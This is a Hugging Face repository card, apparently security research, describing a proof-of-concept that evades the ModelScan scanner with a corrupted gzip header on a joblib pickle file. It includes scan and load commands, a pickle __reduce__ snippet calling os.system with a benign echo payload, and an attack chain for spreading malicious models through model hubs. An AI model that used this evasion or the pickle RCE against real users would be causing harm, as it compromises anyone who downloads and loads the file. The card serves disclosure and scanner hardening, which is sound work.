You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

ModelScan Bypass - Corrupt Compression Header

Security Research - ModelScan Bypass Technique

Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

Technique

Malformed compression header

Gzip file with corrupted header (first byte modified to 0x00)

File

  • exploit_corrupt_header.joblib.gz

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_corrupt_header.joblib.gz

Expected Result

SKIPPED - Scanner did not analyze this file

Triggering the Exploit

import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_corrupt_header.joblib.gz')

Technical Details

This exploit uses Python's pickle __reduce__ method for RCE:

def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))

Why ModelScan misses this:

Gzip file with corrupted header (first byte modified to 0x00)

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using this technique
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!" or skips the file
  5. Victim loads model → RCE

References

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support